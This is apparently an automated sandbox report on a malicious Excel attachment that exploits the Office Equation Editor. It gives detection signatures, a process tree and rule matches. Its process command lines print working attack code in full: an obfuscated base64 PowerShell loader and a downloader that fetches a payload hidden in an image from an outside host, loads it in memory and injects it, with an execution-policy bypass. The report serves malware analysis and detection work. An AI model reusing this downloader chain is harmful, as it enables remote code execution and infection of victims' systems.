Edit tour

Windows Analysis Report
xF3wienia PO2102559-1.xlsx

Overview

General Information

Sample name:	xF3wienia PO2102559-1.xlsx
Analysis ID:	1430780
MD5:	06fd382c8c40f2ce72e90514cda560cc
SHA1:	1dc8dbd9622345985343345b938bd97004621e56
SHA256:	5c235e5cae22c77b759b197a0758357bdb7a2a6c92c0edf829132c50108c668a
Tags:	xlsx
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Creates autostart registry keys with suspicious values (likely registry only malware)

Document contains OLE streams with names of living off the land binaries

Document exploit detected (process start blacklist hit)

Installs new ROOT certificates

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found URL in obfuscated visual basic script code

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2108 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1932 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 3076 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\prnport.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 3160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreMwDgTreyDgTreGoDgTreLwBvDgTreGIDgTrebQBpDgTreGoDgTreLwB1DgTreGUDgTreLgBzDgTreG4DgTreZDgTreB5DgTreC4DgTreaQBhDgTreGoDgTreYQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTredwBvDgTreHIDgTreZDgTreDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\word.vbs MD5: EB32C070E658937AA9FA9F3AE629B2B8)

wscript.exe (PID: 3640 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs" MD5: 045451FA238A75305CC26AC982472367)

wscript.exe (PID: 3768 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\word.vbs" MD5: 045451FA238A75305CC26AC982472367)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sheet1.xml	INDICATOR_XML_LegacyDrawing_AutoLoad_Document	detects AutoLoad documents using LegacyDrawing	ditekSHen	0x3cd:$s1: <legacyDrawing r:id=" 0x3f5:$s2: <oleObject progId=" 0x42b:$s3: autoLoad="true"

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.468489304.00000000095D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: powershell.exe PID: 3160	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3160	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x5bbde:$b2: ::FromBase64String( 0xbb0d8:$b2: ::FromBase64String( 0xbba04:$b2: ::FromBase64String( 0xbca72:$b2: ::FromBase64String( 0xbd0bc:$b2: ::FromBase64String( 0xbd895:$b2: ::FromBase64String( 0xbde5e:$b2: ::FromBase64String( 0xc8ddf:$b2: ::FromBase64String( 0x5ba43:$b3: ::UTF8.GetString( 0xbaf3d:$b3: ::UTF8.GetString( 0xbb869:$b3: ::UTF8.GetString( 0xbc8d7:$b3: ::UTF8.GetString( 0xbcf21:$b3: ::UTF8.GetString( 0xbd6fa:$b3: ::UTF8.GetString( 0xbdcc3:$b3: ::UTF8.GetString( 0xc8c49:$b3: ::UTF8.GetString( 0x12fd7b:$s1: -join 0x1375b6:$s1: -join 0x5968:$s3: reverse 0x6fe7:$s3: reverse 0x72b2:$s3: reverse
Process Memory Space: powershell.exe PID: 3248	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3248	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x102b:$b2: ::FromBase64String( 0x9d2042:$b2: ::FromBase64String( 0x9d3e68:$b2: ::FromBase64String( 0x9f717a:$b2: ::FromBase64String( 0x9f8cb6:$b2: ::FromBase64String( 0x9f9274:$b2: ::FromBase64String( 0xa48c2c:$b2: ::FromBase64String( 0xa491e9:$b2: ::FromBase64String( 0xa4f790:$b2: ::FromBase64String( 0xa509da:$b2: ::FromBase64String( 0xa51741:$b2: ::FromBase64String( 0xa51d09:$b2: ::FromBase64String( 0xa6ae2a:$b2: ::FromBase64String( 0xa6b3e8:$b2: ::FromBase64String( 0xa6c72d:$b2: ::FromBase64String( 0xb06220:$b2: ::FromBase64String( 0xb06816:$b2: ::FromBase64String( 0xb0df0e:$b2: ::FromBase64String( 0xe90:$b3: ::UTF8.GetString( 0x9d1ea7:$b3: ::UTF8.GetString( 0x9d3ccd:$b3: ::UTF8.GetString(

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.powershell.exe.95d0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 5.182.211.151, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1932, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1932, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\prnportjjm[1].vbs

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.32j/obmij/ue.sndy.iaja//:ptth' , '1' , 'C:\ProgramData\' , 'word','AddInProcess32',''))} }", CommandLin

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTr